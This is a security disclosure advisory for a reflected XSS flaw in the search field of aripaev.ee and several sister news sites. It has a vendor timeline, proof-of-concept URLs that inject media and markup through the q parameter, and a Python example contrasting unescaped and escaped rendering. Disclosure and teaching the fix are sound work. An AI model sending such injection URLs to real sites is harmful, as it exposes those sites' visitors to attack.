0. Timeline
0.0 Discovery: 2016.01.12
0.1.1 Sent First Report: 2016.01.12
0.1.2 CERT EE ticket #0015941: 2016.01.12
0.2.0 Sent second report, having heard nothing from vendor: 2016.01.19
0.2.1 Vendor reported ongoing work to fix the issue: 2016.01.21
0.2.2 Vendor reported that it was fixed on 2016.01.25: 2016.01.26
0.2.3 Evaluated the fix, found it only a partial solution, sent findings to vendor: 2016.01.26
0.2.4 Vendor reported that it was fixed on 2016.02.01: 2016.02.01
0.2.5 Evaluated the fix, found it only a partial solution, sent findings to vendor: 2016.02.02
0.3 Disclosure: 2016.03.01

1. Background
aripaev.ee is the website of Äripäev. Äripäev is one of the most successful business newspapers in Europe[0].

2. Problem
Sites created by aripaev.ee have an XSS[1] vulnerability in the search field: the value of the q parameter is reflected into the page without escaping.

3. Proof of Concept (PoC) Code
3.1 Main site
http://www.aripaev.ee/search?q=%22%2F%3E%3Ciframe%20src%3Dhttp%3A%2F%2Fupload.wikimedia.org%2Fwikipedia%2Fcommons%2Fthumb%2F6%2F68%2FLynx_lynx_poing.jpg%2F240px-Lynx_lynx_poing.jpg%3E%3C%2Fiframe%3E&period=2015-01-17Z,2016-01-17Z
or
http://www.aripaev.ee/search?q=%22\%3E%3Caudio%20%20controls%20autoplay%3E%3Csource%20src=%22http://www.rowan.edu/open/philosop/clowney/Aesthetics/AestheticsClasses/class_sessions/session01_intro/Music/Beethoven_5thSymphony.mp3%22%20type=%22audio/mpeg%22%3EYour%20browser%20does%20not%20support%20the%20audio%20tag.%3C/audio%3E
or
http://www.aripaev.ee/search?q=%22\%3E%3Cvideo%20width=%22320%22%20height=%22240%22%20controls%20autoplay%3E%3Csource%20src=%22https://upload.wikimedia.org/wikipedia/en/1/17/Alley_Cat_video_game_theme_song.ogg%22%20type=%22video/ogg%22%3EYour%20browser%20does%20not%20support%20the%20video%20tag.%3C/video%3E
or
http://www.aripaev.ee/search?q=%22/%3E%3Cb%3EBOLD%3C/b%3E
3.2 Subdomains
http://www.bestmarketing.ee/search?q=%22/%3E%3Cimg%20src=%22http://upload.wikimedia.org/wikipedia/commons/thumb/6/68/Lynx_lynx_poing.jpg/240px-Lynx_lynx_poing.jpg%22%3E&period=2015-01-12Z,2016-01-12Z

4. Not an Exhaustive List of Affected Sites
www.aripaev.ee
www.bestmarketing.ee
www.ehitusuudised.ee
www.logistikauudised.ee

5. References
[0] http://firma.aripaev.ee/?id=10631
[1] https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29

6. Mitigation
Just don't click links to aripaev.ee or any of its subdomains.
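The PoC URLs in section 3 all follow one pattern: the q parameter opens with an encoded double quote and "/>", which closes the search input's value attribute and the tag, so whatever follows is parsed as new markup. The user-side advice above is the workaround; the real fix is server-side output encoding. The following Python is an added illustration, not code from the advisory or from the vendor: render_search_vulnerable and render_search_fixed are hypothetical renderings of such a search page, and injected_tags is a check that reports which elements the reflected value produced (the harmless BOLD payload from section 3.1 is used as the sample input).

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Sample input: the harmless PoC URL from section 3.1 of the advisory.
POC_URL = "http://www.aripaev.ee/search?q=%22/%3E%3Cb%3EBOLD%3C/b%3E"


def query_from_url(url):
    """Return the URL-decoded q parameter of a search URL ('' if absent)."""
    params = parse_qs(urlsplit(url).query)
    return params.get("q", [""])[0]


def render_search_vulnerable(q):
    """Hypothetical search form that reflects q into the value attribute verbatim.
    This reproduces the defect class the advisory describes; for illustration only."""
    return '<form><input type="text" name="q" value="' + q + '"></form>'


def render_search_fixed(q):
    """Same form with q HTML-escaped. quote=True also turns " and ' into entities,
    so the value can never close the attribute or the tag early."""
    escaped = html.escape(q, quote=True)
    return '<form><input type="text" name="q" value="' + escaped + '"></form>'


class _StartTagCollector(HTMLParser):
    """Records every start tag the browser-like parser would see."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_tags(page_html):
    """Return the start tags in the rendered page that are not part of the template.
    A non-empty result means the reflected value created new elements, i.e. XSS."""
    collector = _StartTagCollector()
    collector.feed(page_html)
    return [t for t in collector.tags if t not in ("form", "input")]


if __name__ == "__main__":
    q = query_from_url(POC_URL)
    for name, render in (("vulnerable", render_search_vulnerable), ("fixed", render_search_fixed)):
        page = render(q)
        print(name, "->", page)
        print("  injected tags:", injected_tags(page))
```

Running the block shows the vulnerable rendering yields an extra b element while the escaped rendering yields none; the same check can be pointed at any other reflected parameter by swapping the sample URL.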

APPENDIX - IMAGES
aripaev.ee
aripaev.ee-sub-domains